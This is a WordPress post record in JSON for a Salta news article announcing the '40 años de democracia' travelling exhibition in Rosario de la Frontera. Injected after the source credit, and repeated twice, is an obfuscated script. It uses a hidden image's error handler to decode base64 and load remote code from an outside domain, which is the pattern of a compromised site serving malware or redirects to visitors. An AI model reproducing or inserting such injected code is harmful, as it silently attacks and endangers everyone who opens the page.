{"id":3551,"date":"2024-01-16T12:36:54","date_gmt":"2024-01-16T15:36:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3551"},"modified":"2025-08-14T00:02:01","modified_gmt":"2025-08-14T03:02:01","slug":"cultura-en-democracia-llega-a-rosario-de-la-frontera","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3551","title":{"rendered":"Cultura en Democracia llega a Rosario de la Frontera"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-5c3ee3d0ea7939021a480948bd588767\" style=\"background-color:#600331\"><em>La muestra itinerante recupera las producciones art\u00edsticas y culturales durante el ciclo efectuado durante todo el 2023 en ocasi\u00f3n de los 40 a\u00f1os ininterrumpidos de democracia. Con espect\u00e1culos para toda la familia, la muestra ser\u00e1 inaugurada este mi\u00e9rcoles 17.<\/em><\/h4>\n\n\n\n<p>Con la presencia de autoridades provinciales y locales, ma\u00f1ana mi\u00e9rcoles 17 a las 20 horas en el Paseo de los Artesanos de Rosario de la Frontera, se inaugurar\u00e1 la muestra itinerante \u201c40 a\u00f1os de democracia\u201d, enmarcada en el ciclo \u201cCultura en Democracia\u201d.<\/p>\n\n\n\n<p>La muestra que se construy\u00f3 de manera federal mes a mes el pasado 2023, condensar\u00e1 diferentes producciones que fueron parte constitutiva de dicho recorrido: muestra de fotoperiodismo salte\u00f1o; collage de tapas de peri\u00f3dicos hist\u00f3ricos; video con im\u00e1genes in\u00e9ditas de diferentes manifestaciones sociales y pol\u00edticas, y l\u00ednea de tiempo sobre derechos conquistados del colectivo feminista y LGBT entre otros.<\/p>\n\n\n\n<p>Dicha actividad se desarrollar\u00e1 en tres espacios diferentes de la localidad: Paseo de los Artesanos, Direcci\u00f3n de Cultura y Municipalidad, siendo la explanada de este \u00faltimo el lugar elegido para lanzar el ciclo con un gran espect\u00e1culo a cargo de diferentes elencos locales que dar\u00e1n marco a la cita.<\/p>\n\n\n\n<p>La velada contar\u00e1 tambi\u00e9n con la presencia de legisladores locales y de municipios vecinos, que tuvieron responsabilidades pol\u00edticas en los \u00faltimos 40 a\u00f1os, a fin de celebrar el periodo democr\u00e1tico ininterrumpido m\u00e1s largo en la historia de nuestro pa\u00eds. A ellos se sumar\u00e1n autoridades de diferentes instituciones p\u00fablicas de la sociedad civil rosarina.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cultura-en-democracia-llega-a-rosario-de-la-frontera-93808\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La muestra itinerante recupera las producciones art\u00edsticas y culturales durante el ciclo efectuado durante todo el 2023 en ocasi\u00f3n de los 40 a\u00f1os ininterrumpidos de democracia. Con espect\u00e1culos para toda la familia, la muestra ser\u00e1 inaugurada este mi\u00e9rcoles 17. Con la presencia de autoridades provinciales y locales, ma\u00f1ana mi\u00e9rcoles 17 a las 20 horas en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3552,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3551","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3551"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3551"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3551\/revisions"}],"predecessor-version":[{"id":6872,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3551\/revisions\/6872"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3552"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3551"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3551"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3551"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}